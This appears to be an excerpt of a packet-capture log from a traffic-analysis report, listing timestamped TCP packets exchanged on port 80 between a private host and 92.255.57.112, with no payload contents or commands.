                                                                                                                                                                                                Jan 15, 2025 10:09:10.634615898 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634624004 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634628057 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634640932 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634653091 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634658098 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634666920 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634674072 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634687901 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634727955 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634740114 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634751081 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634762049 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634762049 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634784937 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634872913 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634886980 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634896994 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634907961 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634917021 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634927988 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634938002 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634941101 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634951115 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634959936 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634963989 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634977102 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634987116 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634999990 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635003090 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635085106 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635209084 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635226011 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635237932 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635248899 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635261059 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635268927 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635272026 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635286093 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635298014 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635308981 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635323048 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635335922 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635344028 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635351896 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635365963 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635375023 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635376930 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635390997 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635397911 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635405064 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.635426998 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.703624964 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711478949 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711497068 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711517096 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711530924 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711543083 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711565971 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711568117 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711579084 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711591959 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711604118 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711615086 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711616993 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711637020 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711652040 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711659908 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711668968 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711673975 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711687088 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711704016 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711710930 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711716890 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711736917 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711745024 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711754084 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711765051 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711776972 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711783886 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711802959 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711813927 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711824894 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711843014 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711864948 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711865902 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711879015 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711901903 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711901903 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711905956 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711924076 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711935043 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.711956024 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712004900 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712027073 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712053061 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712073088 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712085962 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712105036 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712114096 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712122917 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712137938 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712145090 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712151051 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712160110 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712168932 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712181091 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712191105 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712193012 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.712233067 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719635963 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719662905 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719672918 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719707012 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719722986 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719763994 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719774008 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719779015 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719791889 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719834089 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719835043 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719847918 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719866991 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719877005 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719882965 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719892025 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719902039 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719929934 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719929934 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.719960928 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720015049 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720026016 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720038891 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720048904 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720065117 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720066071 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720098019 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720144033 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720210075 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720263958 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720276117 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720288038 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720299006 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720315933 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720321894 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720335007 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720362902 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720374107 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720375061 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720387936 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720432997 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720444918 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720457077 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720468044 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720479965 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720499992 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720516920 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720519066 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720530033 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720541000 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720541954 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720551968 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720554113 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720591068 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720604897 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720614910 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720619917 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720647097 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720660925 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720668077 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720674992 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720688105 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720700026 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720711946 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720712900 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720751047 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720813990 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720833063 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720845938 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720851898 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720856905 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720870018 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720880032 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720881939 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720895052 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720907927 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720918894 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720930099 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720946074 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720946074 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720949888 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720958948 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720969915 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720980883 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720993042 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.720998049 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721015930 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721015930 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721029997 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721040964 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721052885 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721065044 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721066952 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721079111 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721106052 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721160889 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721172094 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721183062 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721195936 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721198082 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721208096 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721220016 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721229076 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721235037 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721260071 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721298933 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721321106 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721333027 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721338987 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721349001 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721359968 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721366882 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721374035 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721386909 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721389055 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721400976 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721421957 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721440077 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721441031 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721456051 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721471071 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721486092 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721493959 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721502066 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721517086 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721518993 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721534014 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721545935 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721555948 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721559048 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721576929 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721592903 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.721616983 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741723061 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741741896 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741761923 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741780043 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741794109 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741791964 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741806030 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741827011 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741827965 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741842985 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741854906 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741858006 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741868019 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741887093 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741894960 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741895914 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741899967 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741913080 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741923094 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741929054 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741950035 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741952896 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741966009 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741980076 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.741997004 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742010117 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742019892 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742023945 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742039919 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742054939 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742075920 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742075920 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742099047 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742108107 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742111921 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742124081 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742136002 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742149115 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742161036 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742161989 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742175102 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742188931 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742193937 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742206097 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742212057 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742218971 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742230892 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742248058 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742250919 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742260933 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.742275000 CET804970792.255.57.112192.168.2.5
